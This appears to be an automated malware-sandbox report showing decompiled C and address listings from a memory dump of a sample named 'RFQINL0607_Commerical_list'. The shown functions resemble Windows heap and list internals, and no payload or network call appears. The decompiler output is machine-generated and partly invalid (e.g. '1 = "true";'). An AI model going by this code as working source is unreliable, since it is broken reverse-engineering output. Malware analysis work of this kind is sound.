                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33350816
                                                                                                                                                                                  0x33350818
                                                                                                                                                                                  0x33350818
                                                                                                                                                                                  0x3335081b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335081b

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 43
                                                                                                                                                                                  • API String ID: 0-2424788469
                                                                                                                                                                                  • Opcode ID: fad5623f2dbce91522803acf604d981ac9f336669df7910e26ff225df125f573
                                                                                                                                                                                  • Instruction ID: c9a3afb0adefa9e0b00c5af931194101ada870707d215fbade0a090c2069e529
                                                                                                                                                                                  • Opcode Fuzzy Hash: fad5623f2dbce91522803acf604d981ac9f336669df7910e26ff225df125f573
                                                                                                                                                                                  • Instruction Fuzzy Hash: C84192B5A007419FE324CF68C880E52B7F9FF48315B54CA6DE456C7A50EB3AE455CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                                  			E3338360F(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				void* _v96;
				intOrPtr* _t41;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t53;
				signed int _t55;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr _t69;
				void* _t72;
				intOrPtr* _t73;
				intOrPtr _t75;
				void* _t76;
				signed int _t80;

				_t69 = __edx;
				_t82 = (_t80 & 0xfffffff8) - 0x5c;
				_v8 =  *0x3344b370 ^ (_t80 & 0xfffffff8) - 0x0000005c;
				_t41 = _a4;
				_v96 = _t41;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(_t41 == 0) {
					L23:
					_t75 = 0xc000000d;
					goto L10;
				} else {
					_t75 = 0;
					 *_t41 = 0;
					if(__edx == 0) {
						goto L23;
					} else {
						_t73 = __edx + 4;
						_t59 =  *_t73;
						while(_t59 != _t73) {
							_t68 = _t59 - 8;
							if( *_t68 != 0x74736c46) {
								_v72 = 1;
								_v68 = 1;
								_v88 = 1;
								_push( &_v92);
								_v84 = _t75;
								_v76 = 4;
								_v64 = _t73;
								_v60 = _t68;
								_v92 = 0xc0150015;
								E333A8A60(_t68, _t69);
								_t61 = _t59 - 8;
							}
							if( *(_t61 + 4) == 0x20) {
								L22:
								_t59 =  *_t59;
								1 = "true";
								continue;
							} else {
								_t53 = _t75;
								_t69 = _t61;
								while(( *(_t69 + 0x20) & 0x00000004) == 0) {
									_t53 = _t53 + 1;
									_t69 = _t69 + 0x30;
									if(_t53 < 0x20) {
										continue;
									} else {
										goto L22;
									}
									goto L24;
								}
								_t55 =  *(_t61 + 4) + 1;
								 *(_t61 + 4) = _t55;
								 *(_t61 + 0x14) =  !_t55;
								_t12 = _t69 + 0x18; // 0x100000016
								_t61 = _t12;
								if(_t61 == 0) {
									goto L22;
								} else {
									L9:
									 *((intOrPtr*)(_t65 + 8)) = 8;
									 *_v96 = _t65;
									L10:
									_pop(_t72);
									_pop(_t76);
									_pop(_t58);
									return E33394B50(_t75, _t58, _v8 ^ _t82, _t69, _t72, _t76);
								}
							}
							goto L24;
						}
						_t60 = L33365D90(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t75, 0x618);
						if(_t60 == 0) {
							_t75 = 0xc0000017;
							goto L10;
						} else {
							L18();
							 *((intOrPtr*)(_t60 + 4)) = 1;
							_t18 = _t60 + 0x18; // 0x18
							_t65 = _t18;
							 *((intOrPtr*)(_t60 + 0x14)) = 0xfffffffe;
							_t48 = _t60 + 8;
							_t69 =  *_t73;
							if( *((intOrPtr*)(_t69 + 4)) != _t73) {
								_t66 = 3;
								asm("int 0x29");
								 *_t66 = 0x74736c46;
								 *((intOrPtr*)(_t66 + 0x10)) = 0;
								_t67 = _t66 + 0x1c;
								_t49 = 0x20;
								do {
									 *((intOrPtr*)(_t67 - 4)) = 0;
									 *_t67 = 0;
									_t67 = _t67 + 0x30;
									 *((intOrPtr*)(_t67 - 0x2c)) = 0xc;
									 *((intOrPtr*)(_t67 - 0x28)) = 0;
									_t49 = _t49 - 1;
								} while (_t49 != 0);
								return _t49;
							} else {
								 *_t48 = _t69;
								 *((intOrPtr*)(_t48 + 4)) = _t73;
								 *((intOrPtr*)(_t69 + 4)) = _t48;
								 *_t73 = _t48;
								goto L9;
							}
						}
					}
				}
				L24:
			}
































                                                                                                                                                                                  0x3338360f
                                                                                                                                                                                  0x33383617
                                                                                                                                                                                  0x33383621
                                                                                                                                                                                  0x33383625
                                                                                                                                                                                  0x33383628
                                                                                                                                                                                  0x3338362b
                                                                                                                                                                                  0x3338362c
                                                                                                                                                                                  0x3338362d
                                                                                                                                                                                  0x33383630
                                                                                                                                                                                  0x333c2969
                                                                                                                                                                                  0x333c2969
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33383636
                                                                                                                                                                                  0x33383636
                                                                                                                                                                                  0x33383638
                                                                                                                                                                                  0x3338363c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33383642
                                                                                                                                                                                  0x33383642
                                                                                                                                                                                  0x33383647
                                                                                                                                                                                  0x3338364a
                                                                                                                                                                                  0x3338364e
                                                                                                                                                                                  0x33383657
                                                                                                                                                                                  0x333c2925
                                                                                                                                                                                  0x333c2929
                                                                                                                                                                                  0x333c292d
                                                                                                                                                                                  0x333c2935
                                                                                                                                                                                  0x333c2936
                                                                                                                                                                                  0x333c293a
                                                                                                                                                                                  0x333c2942
                                                                                                                                                                                  0x333c2946
                                                                                                                                                                                  0x333c294a
                                                                                                                                                                                  0x333c2952
                                                                                                                                                                                  0x333c2957
                                                                                                                                                                                  0x333c2957
                                                                                                                                                                                  0x33383661
                                                                                                                                                                                  0x333c295f
                                                                                                                                                                                  0x333c295f
                                                                                                                                                                                  0x333c2963
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33383667
                                                                                                                                                                                  0x33383667
                                                                                                                                                                                  0x33383669
                                                                                                                                                                                  0x3338366b
                                                                                                                                                                                  0x333836ab
                                                                                                                                                                                  0x333836ac
                                                                                                                                                                                  0x333836b2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333836b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333836b4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333836b2
                                                                                                                                                                                  0x33383674
                                                                                                                                                                                  0x33383675
                                                                                                                                                                                  0x3338367a
                                                                                                                                                                                  0x3338367d
                                                                                                                                                                                  0x3338367d
                                                                                                                                                                                  0x33383682
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33383688
                                                                                                                                                                                  0x33383688
                                                                                                                                                                                  0x3338368c
                                                                                                                                                                                  0x33383693
                                                                                                                                                                                  0x33383695
                                                                                                                                                                                  0x3338369b
                                                                                                                                                                                  0x3338369c
                                                                                                                                                                                  0x3338369d
                                                                                                                                                                                  0x333836a8
                                                                                                                                                                                  0x333836a8
                                                                                                                                                                                  0x33383682
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33383661
                                                                                                                                                                                  0x333836cd
                                                                                                                                                                                  0x333836d1
                                                                                                                                                                                  0x33383701
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333836d3
                                                                                                                                                                                  0x333836d5
                                                                                                                                                                                  0x333836da
                                                                                                                                                                                  0x333836e1
                                                                                                                                                                                  0x333836e1
                                                                                                                                                                                  0x333836e4
                                                                                                                                                                                  0x333836eb
                                                                                                                                                                                  0x333836ee
                                                                                                                                                                                  0x333836f3
                                                                                                                                                                                  0x3338370a
                                                                                                                                                                                  0x3338370b
                                                                                                                                                                                  0x3338370f
                                                                                                                                                                                  0x33383717
                                                                                                                                                                                  0x3338371a
                                                                                                                                                                                  0x3338371d
                                                                                                                                                                                  0x3338371e
                                                                                                                                                                                  0x3338371e
                                                                                                                                                                                  0x33383721
                                                                                                                                                                                  0x33383723
                                                                                                                                                                                  0x33383726
                                                                                                                                                                                  0x3338372d
                                                                                                                                                                                  0x33383730
                                                                                                                                                                                  0x33383730
                                                                                                                                                                                  0x33383735
                                                                                                                                                                                  0x333836f5
                                                                                                                                                                                  0x333836f5
                                                                                                                                                                                  0x333836f7
                                                                                                                                                                                  0x333836fa
                                                                                                                                                                                  0x333836fd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333836fd
                                                                                                                                                                                  0x333836f3
                                                                                                                                                                                  0x333836d1
                                                                                                                                                                                  0x3338363c
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Flst
                                                                                                                                                                                  • API String ID: 0-2374792617
                                                                                                                                                                                  • Opcode ID: ecfdb600c787c3974d5fa6767ba8e1ac1bf810a40985132acd549eb49a3ba257
                                                                                                                                                                                  • Instruction ID: c74a4b752014d5364b3366c0abad1eaba66b48a0e8e614cd743e602d95c6a482
                                                                                                                                                                                  • Opcode Fuzzy Hash: ecfdb600c787c3974d5fa6767ba8e1ac1bf810a40985132acd549eb49a3ba257
                                                                                                                                                                                  • Instruction Fuzzy Hash: 664177B9A093019FD704CF18C480616FBE4EB49724F58856EE499CF391DB71D94ACB92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333CC6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                  			E333CC6F2(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E33392B00();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L33365D90(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E33392B00();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                                                                                  0x333cc701
                                                                                                                                                                                  0x333cc704
                                                                                                                                                                                  0x333cc707
                                                                                                                                                                                  0x333cc70d
                                                                                                                                                                                  0x333cc70e
                                                                                                                                                                                  0x333cc712
                                                                                                                                                                                  0x333cc717
                                                                                                                                                                                  0x333cc71a
                                                                                                                                                                                  0x333cc71b
                                                                                                                                                                                  0x333cc71c
                                                                                                                                                                                  0x333cc71d
                                                                                                                                                                                  0x333cc71f
                                                                                                                                                                                  0x333cc722
                                                                                                                                                                                  0x333cc729
                                                                                                                                                                                  0x333cc72a
                                                                                                                                                                                  0x333cc72b
                                                                                                                                                                                  0x333cc732
                                                                                                                                                                                  0x333cc736
                                                                                                                                                                                  0x333cc738
                                                                                                                                                                                  0x333cc738
                                                                                                                                                                                  0x333cc743
                                                                                                                                                                                  0x333cc7ac
                                                                                                                                                                                  0x333cc7ae
                                                                                                                                                                                  0x333cc7b0
                                                                                                                                                                                  0x333cc7c0
                                                                                                                                                                                  0x333cc7c2
                                                                                                                                                                                  0x333cc7cf
                                                                                                                                                                                  0x333cc7cf
                                                                                                                                                                                  0x333cc7d5
                                                                                                                                                                                  0x333cc7da
                                                                                                                                                                                  0x333cc7da
                                                                                                                                                                                  0x333cc7b5
                                                                                                                                                                                  0x333cc7ba
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cc7ba
                                                                                                                                                                                  0x333cc758
                                                                                                                                                                                  0x333cc75c
                                                                                                                                                                                  0x333cc766
                                                                                                                                                                                  0x333cc767
                                                                                                                                                                                  0x333cc76d
                                                                                                                                                                                  0x333cc76e
                                                                                                                                                                                  0x333cc770
                                                                                                                                                                                  0x333cc771
                                                                                                                                                                                  0x333cc779
                                                                                                                                                                                  0x333cc77d
                                                                                                                                                                                  0x333cc7be
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cc7be
                                                                                                                                                                                  0x333cc783
                                                                                                                                                                                  0x333cc78b
                                                                                                                                                                                  0x333cc78b
                                                                                                                                                                                  0x333cc790
                                                                                                                                                                                  0x333cc794
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cc796
                                                                                                                                                                                  0x333cc799
                                                                                                                                                                                  0x333cc799
                                                                                                                                                                                  0x333cc7a3
                                                                                                                                                                                  0x333cc7a5
                                                                                                                                                                                  0x333cc7a5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cc7a3
                                                                                                                                                                                  0x333cc794
                                                                                                                                                                                  0x333cc75e
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: BinaryName
                                                                                                                                                                                  • API String ID: 0-215506332
                                                                                                                                                                                  • Opcode ID: fd04b0acbbc0aca7afa225b98c55436a5f81e0e7a5cfa931b65b7023e222f214
                                                                                                                                                                                  • Instruction ID: 0895ee670c3ec665b13bb87385242d5d1227b020a44b51074ebe806b1427396b
                                                                                                                                                                                  • Opcode Fuzzy Hash: fd04b0acbbc0aca7afa225b98c55436a5f81e0e7a5cfa931b65b7023e222f214
                                                                                                                                                                                  • Instruction Fuzzy Hash: E131E3BAD41659AFEB15CE58C895E6FB7B8EF80B20F01C129F900A7650D7309E06C7E0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333A717A Relevance: .7, Instructions: 705COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                  			E333A717A(signed int __ecx, signed int __edx, signed int _a4, signed short _a8, signed short _a12) {
				unsigned int _v5;
				signed int _v6;
				signed int _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed short _v32;
				signed int _v36;
				signed int* _v40;
				signed short _v44;
				signed int _v48;
				signed short _v52;
				signed int _v56;
				char _v60;
				unsigned int _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t250;
				signed short _t252;
				signed short _t253;
				signed short _t254;
				unsigned int _t267;
				signed short _t270;
				signed int _t271;
				signed int* _t274;
				signed int _t276;
				signed int _t281;
				signed char _t282;
				signed short _t283;
				signed short _t289;
				signed char _t290;
				signed int _t295;
				signed short _t298;
				signed short* _t299;
				signed int _t305;
				signed short _t307;
				signed int _t310;
				signed short _t315;
				void* _t318;
				signed int _t322;
				signed short _t323;
				signed short _t328;
				signed char* _t329;
				signed char _t330;
				signed int _t335;
				signed int _t344;
				signed short _t348;
				signed short _t351;
				signed char _t353;
				signed char _t355;
				signed short _t356;
				signed short _t358;
				signed short _t359;
				signed short _t361;
				unsigned int _t362;
				signed int _t363;
				signed int _t370;
				signed int _t372;
				signed short _t373;
				signed short _t374;
				unsigned int _t378;
				void* _t387;
				unsigned int _t392;
				void* _t393;
				signed short _t395;
				signed int _t396;
				signed short _t397;
				signed int* _t406;
				intOrPtr _t409;
				signed short _t425;
				unsigned int _t430;
				intOrPtr* _t431;
				unsigned int _t437;
				void* _t442;
				void* _t443;
				signed short* _t444;
				unsigned int _t445;
				signed short _t449;
				unsigned int _t456;
				void* _t463;
				signed int _t476;
				void* _t478;
				signed char _t480;
				signed short _t481;
				void* _t483;
				signed int _t486;
				signed int _t491;
				signed int* _t492;
				signed short* _t494;
				void* _t497;
				signed short _t498;
				signed short _t499;
				intOrPtr _t504;
				signed int _t509;
				unsigned int _t511;
				signed int _t519;
				signed short _t521;
				signed int _t523;
				signed short _t527;
				signed int _t528;
				signed int _t531;
				signed int _t535;
				signed int _t536;
				signed int _t541;
				signed short _t542;
				signed short* _t545;
				signed char* _t546;
				unsigned int _t547;
				signed short _t550;
				void* _t552;
				signed int _t553;
				signed short _t555;

				_t535 = __ecx;
				_t378 = 0;
				_t249 = __edx;
				_v12 = __ecx;
				_v20 = __edx;
				_t518 = 0;
				if( *((intOrPtr*)(__ecx + 8)) != 0xddeeddee) {
					__eflags =  *(__ecx + 0x44) & 0x01000000;
					if(( *(__ecx + 0x44) & 0x01000000) != 0) {
						L148:
						_t250 = L33363C60(_t535, _t518, _t249);
						_t519 = _t250 & 0x000000ff;
						__eflags = _t250;
						if(_t250 == 0) {
							goto L7;
						}
						L149:
						_t252 = _a12;
						__eflags = _t252;
						if(_t252 != 0) {
							__eflags = 0;
							 *_t252 = 0;
						}
						_t253 = _a8;
						__eflags = _t253;
						if(_t253 != 0) {
							 *_t253 = _t378;
						}
						_t254 = L33363C20(_t535);
						__eflags = _t254;
						if(_t254 != 0) {
							__eflags = _a4 & 0x10000000;
							if((_a4 & 0x10000000) == 0) {
								E3340E8B1(_t535, _v20);
							}
						}
						goto L7;
					}
					__eflags =  *(__ecx + 0x48) & 0x00000001;
					if(__eflags == 0) {
						__eflags = __edx & 0x00000007;
						if((__edx & 0x00000007) != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(__edx);
							_t387 = 9;
							E33415FED(_t387, __ecx);
						} else {
							_t518 = __edx - 8;
							__eflags =  *(_t518 + 7) - 5;
							if( *(_t518 + 7) == 5) {
								_t518 = _t518 - (( *(_t518 + 6) & 0x000000ff) << 3);
								__eflags = _t518;
							}
							__eflags =  *(_t518 + 7) & 0x0000003f;
							if(( *(_t518 + 7) & 0x0000003f) == 0) {
								_push(_t378);
								_push(_t378);
								_push(_t378);
								_push(_t518);
								_t463 = 8;
								E33415FED(_t463, _t535);
								_t518 = _t378;
							}
						}
					} else {
						_t518 = E3334A4D2(0, __ecx, __edx, 0, __ecx, __eflags);
					}
					__eflags = _t518;
					if(_t518 != 0) {
						_t249 = _v20;
						__eflags =  *((char*)(_t249 - 1)) - 5;
						if( *((char*)(_t249 - 1)) != 5) {
							L59:
							__eflags =  *(_t518 + 7) - _t378;
							if( *(_t518 + 7) >= _t378) {
								goto L148;
							}
							_t392 = _t518 >> 0x00000003 ^  *_t518 ^  *0x33446964 ^ _t535;
							__eflags = _t392;
							if(_t392 != 0) {
								L146:
								_push(_t378);
								_push(_t378);
								_push(_t378);
								_push(_t518);
								_t393 = 3;
								E33415FED(_t393, _t535);
								L65:
								_t519 = 1;
								goto L149;
							}
							_t395 =  *(_t518 - (_t392 >> 0xd));
							_v16 = _t395;
							__eflags = _t395;
							if(_t395 == 0) {
								goto L146;
							}
							_t536 =  *(_t395 + 4);
							_t476 =  *(_t518 + 4) >> 0x00000008 & 0x0000ffff;
							_v24 = _t536;
							_v32 = _t378;
							_v36 = _t476;
							_t396 =  *( *((intOrPtr*)( *_t395)) + 0xc);
							_v44 = _t396;
							_t267 =  *(_t536 + 0x10) ^ _t396 ^ _t536 ^  *0x33446964;
							__eflags = (_t267 & 0x0000ffff) + (_t267 >> 0x10) * _t476 + _v24 - _t518;
							if((_t267 & 0x0000ffff) + (_t267 >> 0x10) * _t476 + _v24 == _t518) {
								_t270 = L33363C40();
								__eflags = _t270;
								if(_t270 == 0) {
									_t271 = 0x7ffe0380;
								} else {
									_t271 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								_t478 = 1;
								__eflags =  *_t271 - _t378;
								if( *_t271 != _t378) {
									_t271 =  *[fs:0x30];
									__eflags =  *(_t271 + 0x240) & 1;
									if(( *(_t271 + 0x240) & 1) != 0) {
										_t93 = _t518 + 8; // 0x8
										_t271 = E3340F247( *((intOrPtr*)(_v44 + 0xc)), _t93, 2);
										_t478 = 1;
										__eflags = 1;
									}
								}
								__eflags = _t478 -  *0x7ffe036a;
								_t397 = _t378;
								_v44 = _t397;
								asm("sbb eax, eax");
								_v48 = _t271 & 0x00000064;
								_t274 = _v16 + 0x10;
								_v40 = _t274;
								while(1) {
									_t541 =  *_t274;
									_t276 = _t541 >> 0x10;
									_v28 = _t541;
									__eflags = _t276 & 0x00008000;
									if((_t276 & 0x00008000) != 0) {
										goto L77;
									}
									asm("lock cmpxchg [esi], ecx");
									_t542 = _v28;
									__eflags = _t541 - _t542;
									if(_t541 == _t542) {
										L79:
										 *(_t518 + 7) = 0x80;
										__eflags = _t542 - 0xffffffff;
										if(_t542 != 0xffffffff) {
											_t521 = _v16;
											asm("btr [eax], ecx");
											__eflags =  *((intOrPtr*)(_t521 + 0xc)) - _t378;
											if( *((intOrPtr*)(_t521 + 0xc)) == _t378) {
												L88:
												_t281 = (_t542 & 0x0000ffff) + _v32 + 0x00000001 | _v36 << 0x00000010;
												_t545 =  *_t521;
												__eflags = _t281 -  *(_t521 + 0x18);
												if(_t281 !=  *(_t521 + 0x18)) {
													L127:
													 *(_t521 + 0x10) = _t281;
													_t282 =  *(_t521 + 0x1c);
													__eflags = _t282 & 0x00000002;
													if((_t282 & 0x00000002) != 0) {
														L64:
														_t535 = _v12;
														goto L65;
													}
													_t283 = E33363AF6(_t545, _t521);
													__eflags = _t283;
													if(_t283 == 0) {
														goto L64;
													}
													_t219 = _t521 + 0x1c; // 0x4
													_t546 = _t219;
													while(1) {
														_t480 =  *_t546;
														__eflags = _t480;
														if(_t480 == 0) {
															goto L64;
														}
														__eflags = _t480 & 0x00000002;
														if((_t480 & 0x00000002) != 0) {
															goto L64;
														}
														asm("lock cmpxchg [esi], ecx");
														__eflags = _t480 - _t480;
														if(_t480 != _t480) {
															continue;
														}
														_t406 =  *_t521;
														_t547 = _t378;
														_v40 = _t406;
														do {
															_t289 = _t406 + ((( *(_t406 + 0x5e) & 0x0000ffff) + _t547 & 0x0000000f) + 2) * 4;
															_t481 =  *_t289;
															_v44 = _t289;
															__eflags = _t481;
															if(_t481 != 0) {
																_t290 =  *(_t481 + 0x1c);
																__eflags = _t290 & 0x00000001;
																if((_t290 & 0x00000001) != 0) {
																	goto L140;
																}
																asm("lock cmpxchg [edi], ecx");
																_t521 = _v16;
																__eflags = _t481 - _t481;
																if(_t481 == _t481) {
																	_t523 = 0xfffffffd;
																	_t295 =  *(_t481 + 0x1c);
																	do {
																		__eflags = _t295 & _t523;
																		asm("lock cmpxchg [esi], ecx");
																	} while ((_t295 & _t523) != 0);
																	__eflags = _t295 - 2;
																	if(_t295 != 2) {
																		goto L64;
																	}
																	_t409 =  *( *_t481);
																	 *_t481 = _t378;
																	_t483 = _t481 + 0x20;
																	L81:
																	E333620E0(_t409, _t483);
																	goto L64;
																}
																L139:
																_t406 = _v40;
																goto L140;
															}
															asm("lock cmpxchg [edx], ecx");
															__eflags = 0;
															if(0 == 0) {
																goto L64;
															}
															goto L139;
															L140:
															_t547 = _t547 + 1;
															__eflags = _t547 - 0x10;
														} while (_t547 < 0x10);
														_t235 =  *_t521 + 0x5c; // 0x56ff8bc3
														_t239 = _t521 + 0x20; // 0x8
														_t483 = _t239;
														_t409 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t521) + 0xc)) + 0x3c0 + ( *_t235 & 0x0000ffff) * 4)) + 0x48;
														goto L81;
													}
													goto L64;
												}
												_v36 =  *((intOrPtr*)( *_t545 + 0x10));
												_v44 = _t545[0x2c];
												_t417 = _t545[0x2a];
												__eflags = _t417 - _t478;
												if(_t417 != _t478) {
													L92:
													_t298 =  *_t521;
													_v44 = _t298;
													_t299 = _t298 + 4;
													_t550 =  *_t299;
													 *_t299 = 0;
													__eflags = _t550;
													if(_t550 == 0) {
														L118:
														__eflags =  *(_t521 + 0x16) & 0x00000003;
														_t551 =  *( *_v44 + 0xc);
														_v44 =  *( *_v44 + 0xc);
														_v48 =  *_t521;
														if(( *(_t521 + 0x16) & 0x00000003) != 0) {
															_v56 =  *((intOrPtr*)(_t521 + 4)) + 0x0000101f & 0xfffff000;
															_t315 = E33410E2D(_t521);
															_push( &_v60);
															_t425 = ( *(_t521 + 0x18) & 0x0000ffff) * (_t315 & 0x0000ffff) << 3;
															__eflags = _t425;
															_v52 = _t425;
															_t318 = E3334F0E1( *((intOrPtr*)(_t551 + 0xc)), _t478);
															_t417 = _t425;
															_push(_t318);
															_push( &_v52);
															_push( &_v56);
															_push(0xffffffff);
															E33392EB0();
														}
														 *( *((intOrPtr*)(_t521 + 4)) + 0xc) = _t378;
														E3336252B(_t551,  *((intOrPtr*)(_t521 + 4)), _t417);
														_t305 =  *(_t521 + 0x18) & 0x0000ffff;
														_v36 = _t305;
														_t307 = _v48 + 0x50;
														__eflags = _t307;
														_v36 =  ~_t305;
														_v32 = _t307;
														goto L121;
														do {
															do {
																L121:
																_t552 =  *_t307;
																_t486 =  *((intOrPtr*)(_t307 + 4));
																_v48 = _t486;
																asm("lock cmpxchg8b [edi]");
																__eflags = _t552 - _t552;
																_t307 = _v32;
															} while (_t552 != _t552);
															__eflags = _t486 - _v48;
														} while (_t486 != _v48);
														_t527 = _v16;
														_t378 = 0;
														__eflags = 0;
														 *((intOrPtr*)(_t527 + 4)) = 0;
														asm("lock inc dword [eax+0x20]");
														 *((intOrPtr*)(_t527 + 0x10)) = 0;
														_t213 = _t527 + 0x1c; // 0x4
														_t553 = 0xfffffffe;
														_t310 =  *_t213;
														do {
															__eflags = _t310 & _t553;
															asm("lock cmpxchg [edx], ecx");
														} while ((_t310 & _t553) != 0);
														__eflags = _t310 - 1;
														if(_t310 != 1) {
															goto L64;
														}
														_t214 = _t527 + 0x20; // 0x8
														_t483 = _t214;
														_t409 =  *((intOrPtr*)( *_t527));
														 *_t527 = 0;
														goto L81;
													}
													_t144 = _t550 + 0x1c; // 0x1c
													_t528 = 0xfffffff9;
													_t322 =  *_t144;
													do {
														__eflags = _t322 & _t528;
														asm("lock cmpxchg [edx], ecx");
													} while ((_t322 & _t528) != 0);
													_t521 = _v16;
													__eflags = _t322 - 6;
													if(_t322 != 6) {
														_t417 = _v44;
														_t323 = E33363AF6(_v44, _t550);
														__eflags = _t323;
														if(_t323 == 0) {
															L117:
															_t478 = 1;
															__eflags = 1;
															goto L118;
														} else {
															goto L98;
														}
														while(1) {
															L98:
															_t491 =  *(_t550 + 0x1c);
															__eflags = _t491;
															if(_t491 == 0) {
																goto L117;
															}
															__eflags = _t491 & 0x00000002;
